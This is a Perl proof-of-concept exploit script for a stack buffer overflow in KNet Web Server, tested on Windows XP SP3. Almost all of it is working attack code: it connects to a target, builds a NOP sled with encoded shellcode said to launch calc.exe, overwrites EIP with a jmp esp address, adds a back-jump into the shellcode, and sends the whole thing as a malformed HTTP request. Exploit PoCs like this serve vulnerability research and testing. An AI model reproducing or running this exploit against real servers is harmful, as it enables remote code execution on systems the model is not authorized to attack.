#!/usr/bin/perl
# KNet Web Server Stack corruption BoF PoC
# Written by Wireghoul - http://www.justanotherhacker.com
# Date: 2013/04/11
# Version: 1.04b
# Tested on: WinXP SP3

use IO::Socket::INET;
$host = shift;
$port = shift;
print "KNet Web Server stack corruption BoF PoC - Wireghoul -
http://www.justanotherhacker.com\n";
die "Usage $0 <host> <port>\n" unless $host && $port;
$sock = IO::Socket::INET->new("$host:$port") or die "Unable to connect to
$host:$port\n";

# Shellcode for calc.exe
$shellcode=
"\x89\xe2\xda\xd5\xd9\x72\xf4\x5d\x55\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x6b\x4c\x78\x68\x4e\x69\x45\x50\x73\x30" .
"\x63\x30\x61\x70\x6e\x69\x78\x65\x75\x61\x39\x42\x62\x44" .
"\x6c\x4b\x51\x42\x34\x70\x4e\x6b\x72\x72\x46\x6c\x4e\x6b" .
"\x71\x42\x37\x64\x4e\x6b\x44\x32\x36\x48\x54\x4f\x4e\x57" .
"\x53\x7a\x35\x76\x76\x51\x39\x6f\x44\x71\x4b\x70\x4e\x4c" .
"\x77\x4c\x35\x31\x73\x4c\x47\x72\x64\x6c\x67\x50\x4a\x61" .
"\x78\x4f\x54\x4d\x33\x31\x68\x47\x49\x72\x6a\x50\x73\x62" .
"\x63\x67\x6c\x4b\x52\x72\x66\x70\x6e\x6b\x53\x72\x77\x4c" .
"\x63\x31\x48\x50\x6e\x6b\x73\x70\x64\x38\x6e\x65\x69\x50" .
"\x52\x54\x50\x4a\x65\x51\x48\x50\x56\x30\x4c\x4b\x70\x48" .
"\x47\x68\x4c\x4b\x42\x78\x37\x50\x66\x61\x78\x53\x39\x73" .
"\x77\x4c\x57\x39\x4c\x4b\x75\x64\x4c\x4b\x77\x71\x38\x56" .
"\x70\x31\x59\x6f\x76\x51\x39\x50\x6c\x6c\x6f\x31\x6a\x6f" .
"\x34\x4d\x53\x31\x78\x47\x45\x68\x79\x70\x42\x55\x6b\x44" .
"\x77\x73\x61\x6d\x59\x68\x47\x4b\x51\x6d\x34\x64\x62\x55" .
"\x4d\x32\x31\x48\x4c\x4b\x71\x48\x47\x54\x37\x71\x4e\x33" .
"\x43\x56\x4e\x6b\x76\x6c\x32\x6b\x6c\x4b\x70\x58\x57\x6c" .
"\x36\x61\x79\x43\x6e\x6b\x73\x34\x6e\x6b\x33\x31\x4a\x70" .
"\x4b\x39\x73\x74\x34\x64\x54\x64\x63\x6b\x31\x4b\x65\x31" .
"\x33\x69\x72\x7a\x70\x51\x39\x6f\x69\x70\x70\x58\x31\x4f" .
"\x52\x7a\x6c\x4b\x36\x72\x58\x6b\x6b\x36\x73\x6d\x63\x5a" .
"\x55\x51\x4c\x4d\x6b\x35\x6c\x79\x35\x50\x63\x30\x65\x50" .
"\x66\x30\x35\x38\x46\x51\x6e\x6b\x50\x6f\x4c\x47\x79\x6f" .
"\x6e\x35\x4d\x6b\x5a\x50\x68\x35\x6f\x52\x62\x76\x42\x48" .
"\x6f\x56\x6d\x45\x4f\x4d\x6f\x6d\x4b\x4f\x7a\x75\x75\x6c" .
"\x66\x66\x31\x6c\x74\x4a\x6f\x70\x79\x6b\x4b\x50\x52\x55" .
"\x53\x35\x6d\x6b\x50\x47\x36\x73\x42\x52\x52\x4f\x72\x4a" .
"\x45\x50\x72\x73\x6b\x4f\x6b\x65\x30\x63\x33\x51\x52\x4c" .
"\x50\x63\x64\x6e\x51\x75\x42\x58\x45\x35\x57\x70\x41\x41";

$dist=1003-length($shellcode);
$payload = "\x90"x$dist; # Distance to overwrite EIP
$payload.=$shellcode;
$payload.="\x90" x 8; #Spacer between EIP and shellcode
$payload.= "\x53\x93\x42\x7e"; #Overwrite EIP with jmp esp
$payload.="\x90\x90\x90\x90\xE9\xF4\xFC\xFF\xFF"; #stack padding + BP +
Near jmp-300
$payload.=" / HTTP/1.0\r\n\r\n"; # Needs to be a valid HTTP request

print $sock $payload;


